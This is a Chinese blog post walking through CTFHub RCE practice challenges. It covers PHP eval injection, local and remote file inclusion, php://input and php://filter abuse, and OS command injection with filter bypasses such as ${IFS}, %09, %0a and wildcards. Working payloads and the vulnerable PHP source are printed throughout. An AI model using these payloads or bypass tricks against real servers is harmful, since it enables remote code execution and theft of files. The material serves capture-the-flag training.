CTFHub 技能树 -RCE

最新推荐文章于 2024-05-28 13:03:38 发布
最新推荐文章于 2024-05-28 13:03:38 发布
阅读量105 收藏
点赞数 1
文章标签: 服务器 前端 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63963927/article/details/133855354
版权

CTFHub – RCE

RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统

eval执行文件

查看一开始的源代码:

<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

 

php函数意思是:

是否由变量cmd 如果有,就执行eval($_REQUEST['cmd']);也就是 木马

 __isset判断一个变量是否已设置, 即变量已被声明,且其值为ture

 所以我们在访问的时候使用变量 cmd

/?cmd=system("ls");

 此处因为根目录无flag 所以看上一级目录

/?cmd=system("ls /");

 然后查找flag:

/?cmd=system("cat /flag_5647");

 

文件包含

<?php
error_reporting(0);
if (isset($_GET['file'])) {
    if (!strpos($_GET["file"], "flag")) {
        include $_GET["file"];
    } else {
        echo "Hacker!!!";
    }
} else {
    highlight_file(__FILE__);
}
?>
<hr>
i have a <a href="shell.txt">shell</a>, how to use it ?

根据页面的源码,知道可以GET方式传入一个file参数,传入的file将会被inlcude包含,因此被包含文件中的命令也会被当做PHP指令执行。

点击页面上的shell,可以看到shell.txt的内容:

可知,题目已经提供了一句话木马,所以我们的目标就是在index页面包含shell.txt,然后将ctfhub参数传入,以执行我们想要执行的命令,这里还需要注意,传入的命令中不能包含flag字符串,这里可以使用通配符来绕过。payload:

http://challenge-2f034509829299a7.sandbox.ctfhub.com:10080/?file=shell.txt

拿到flag 

 

 php://input

<?php
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 6) === "php://" ) {
        include($_GET["file"]);
    } else {
        echo "Hacker!!!";
    }
} else {
    highlight_file(__FILE__);
}
?>
<hr>
i don't have shell, how to get flag? <br>
<a href="phpinfo.php">phpinfo</a>

根据题目提示,可以查看phpinfo();的内容,结合题目的名称,查找php://input的相关设置:

 如果文件名前六个如果是:php://则执行include包含函数

所以可以使用php://input来执行命令。

使用BP抓包来传递命令:

<?php eval(system('ls /'));?>  

<?php eval(system('cat /flag_7470'));?>

 

 远程包含

<?php
error_reporting(0);
if (isset($_GET['file'])) {
    if (!strpos($_GET["file"], "flag")) {
        include $_GET["file"];
    } else {
        echo "Hacker!!!";
    }
} else {
    highlight_file(__FILE__);
}
?>
<hr>
i don't have shell, how to get flag?<br>
<a href="phpinfo.php">phpinfo</a>

 

<?php eval(system('ls /'));?>

 

<?php eval(system('cat /flag'));?>

 读取源代码

题目中直接说 flag in/flag

所以我们直接使用 php://filter

 

?file=php://filter/resource=/flag

命令注入

1&ls

1&cat 36182730223783.php

右键检查源码:

 命令注入-cat过滤

当cat被过滤后,可以使用一下命令进行读取文件的内容
(1)more:一页一页的显示的显示档案内容
(2)less:与more类似,但是比more更好的是,他可以[pg dn][pg up]翻页
(3)head:查看头几行
(4)tac:从最后一行开始显示,可以看出tac是cat的反向显示
(5)tail:查看尾几行
(6)nl:显示的时候,顺便输出行号
(7)od:以二进制的方式读取档案内容
(8)vi:一种编辑器,这个也可以查看
(9)vim:一种编辑器,这个也可以查看
1&ls

1&head flag_175242870532150.php

 命令注入-过滤空格

1&ls

 可是回显的是空格被过滤了,那么使用<或${IFS}试试

1&cat<flag_3030418502354.php

 命令注入-过滤目录分隔符

1;ls

发现文件夹flag_is_here,接下来我们使用cd命令,进入到文件夹,ls查看这个文件的内容

  

1;cd flag_is_here;ls

 

1;cd flag_is_here;cat  flag_11777116454279.php

命令注入-过滤运算符

过滤了管道符 |

1;ls

 

1;cat flag_66881021512.php

综合过滤练习 

发现逗号 ;被过滤

使用%0a试试,发现ls命令被成功执行

在URL上输入/?ip=1%0als,在输入框输入不行

 

进入flag文件,并查询里面的内容

/?ip=1%0acd%09f*%0als

 

%09代替空格(${IFS}代替空格)

%0a代替 ;

f*代替flag文件

查看flag的内容

/?ip=1%0acd%09f*%0atac%09fl*

 

 

拾 味
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CTFhub 文件包含
qq_41497476的博客
07-27 2524
这类题目很久以前接触过,也有过应用,主要的方法是利用一些伪协议完成后台信息的提取 题目源码 <?php error_reporting(0); if (isset($_GET['file'])) { if (!strpos($_GET["file"], "flag")) { include $_GET["file"]; } else { echo "Hacker!!!"; } } else { highlight_file(__FILE_
laravel-8.4.2-rce
05-28
laravel-8.4.2-rce 设置环境 git clone https://github.com/laravel/laravel.git cd laravel git checkout e849812 composer install composer require facade/ignition==2.5.1 php artisan serve 用法 python3 exploit.py http://pwnme.me:8000 /var/www/html/laravel/storage/logs/laravel.log ' uname -a ' 参考
CTFHUB——RCE之eval执行和文件包含漏洞
m0_46467017的博客
08-31 5009
代码解释:本关代码和第一关文件包含一样,通过strpos函数判断参数是否存在flag字符,存在就执行include函数。因为本关没有限制php://input伪协议,所以本关解法和上一关一样,这里就不再赘述了。代码解释:本关代码和之前php://input关卡一样,通过substr函数来判断file参数是否等于php://,如果等于就执行include函数。代码解释为如果存在cmd参数,那就用eval函数执行cmd参数中的代码,所以本关存在命令执行。连接成功后,其余步骤与上一关相同。...
CTFHUB RCE——文件包含
winofkill的博客
12-11 6028
1.文件包含 首先我们开启题目 看到的是一大串代码 我们仔细看一下php代码,重点是 if(!strpos($_GET["file"],"flag")){ include$_GET["file"]; 这里有一个strpos(string,find,start)函数 意思在string字符串中找find的位置,start是查找的开始位置 那么这句代码的意思就是如果file中没有flag字符串就执行下面的include$_GET["file"] 否则...
CTFHub技能树 Web-RCE 详解
weixin_45808483的博客
11-13 1956
RCE简介: 初学RCE(远程命令/代码执行漏洞)https://blog.csdn.net/qq_43814486/article/details/90020139 eval执行 启动环境 分析代码,提示我们将命令赋值给cmd执行 我们先查看当前位置的文件,没有什么用 /?cmd=system("ls"); 我们查看根目录文件,发现一个 flag_8999 文件 /?cmd=system("ls /"); 我们先尝试使用cat 命令查看 flag_8999文件 /..
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 1936
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
CTFHub-技能树-web-RCE
yuqie的博客
06-14 174
RCE(Remote Code/Command Execute)为远程代码/命令执行的漏洞。攻击者可以直接在web页面向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。
ctfhub--技能树rce
lulu001128的博客
02-28 657
解题思路
CTFHub-Web-RCE-文件包含
qq_54037445的博客
11-29 895
文件包含,伪协议
Apache-druid-kafka-rce.yaml
04-30
kafka相关RCE漏洞poc,扫描器的yaml文件,可以导入yara扫描器进行授权漏洞渗透测试。
CVE-2021-21972-vCenter-6.5-7.0-RCE-POC
03-04
CVE-2021-21972-vCenter-6.5-7.0-RCE-POCpoc只需验证某人的路径的返回状态POC仅用于测试,未添加EXP模块POC仅用于测试,未加入exp模块
Apache-Solr-RCE-via-Velocity-template
03-09
Apache-Solr-RCE-Velocity模板突破产生原因:当攻击者可以直接访问Solr控制台时,可以通过发送类似/例程名/ config的POST请求该例程的配置文件进行更改。 Apache Solr内置IntegratedVelocityResponseWriter插件,在...
Python-Pickle-RCE-Exploit:具有易受攻击的Flask App的简单RCE PoC
03-17
Python-Pickle-RCE-漏洞利用 具有易受攻击的Flask应用程序的简单RCE Pickle PoC 在Python中,pickle模块可让您序列化和反序列化数据。 从本质上讲,这意味着您可以将Python对象转换为字节流,然后稍后在其他进程或...
CTFHub 技能树-- RCE(详解)
m0_62879498的博客
02-20 5083
CTFHubRCE RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统 eval执行文件 查看一开始的源代码: <?php if(isset($_REQUEST['cmd'])){ eval($_REQUEST['cmd']); } else{ highlight_file(__FILE__); } ?> php函数意思是: 是否由变量cmd 如果有,就执行eval($_REQUEST['cmd
华纳云:在一个服务器上如何设置多个IP地址?
YOKEhn的博客
05-27 330
在Windows上,可以通过网络连接的高级TCP/IP设置或使用netsh命令添加多个IP地址。在一个服务器上设置多个IP地址的具体步骤取决于所使用的操作系统(例如Linux或Windows)。你也可以使用ip命令临时配置多个IP地址,这在需要立即生效但不重启网络服务的情况下非常有用。在“IP 设置”标签下,点击“添加”按钮,输入新的IP地址和子网掩码,然后点击“添加”。选择“Internet 协议版本 4 (TCP/IPv4)”,然后点击“属性”。右键点击要配置的网络适配器,选择“属性”。
webserver服务器从零搭建到上线(八)|EpollPoller事件分发器类
最新发布
糖炒栗子
05-28 844
EPollPoller 类实现了基于 epoll 的 I/O 多路复用,通过监控多个文件描述符上的事件,并在事件发生时通知相应的 Channel 对象来处理事件。通过实现这些函数,EPollPoller 能够高效地管理和分发事件。下一节,我们将讲解EventLoop类的具体实现!
TPM之VMK密封
柳似烟的专栏
05-27 377
同样的,具备TPM芯片的电脑,在系统中存在一个\Device\TPM的设备以及对应的TPM驱动程序,所以,当对系统进行基于TPM芯片的Bitlocker加密时,存在DeviceIOControl的交互,下面通过抓包来窥探这一过程。同样,基于TPM的安全启动链也不做过多解释,简单说就是当电脑通过TPM进行全盘加密后,后期对电脑的改动影响系统启动,PCR校验不通过时,触发输入恢复密钥的“蓝屏”。通过分析保存的json格式的文件,追踪文件句柄,得到TPM加密时的所有与驱动层的交互数据。PCR校验位图解释如下。
Centos 7 安装刻录至硬件服务器
qq_45212655的博客
05-27 425
在日常测试中,会遇到很多安装的场景,今天给大家讲一下centos 7 的安装,希望对大家有所帮助。硬件与虚拟机的搭建最主要的区别就是,iso需要一个硬件介质,官方镜像下载地址https://www.centos.org/download/
ctfhub rce
09-01
你想了解关于 CTFHubRCE(远程命令执行)相关内容吗?CTFHub 是一个针对CTF(Capture The Flag)竞赛的学习平台,而RCE是一种常见的漏洞类型之一。在CTFHub上,你可以学习如何发现和利用RCE漏洞来获取系统权限。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值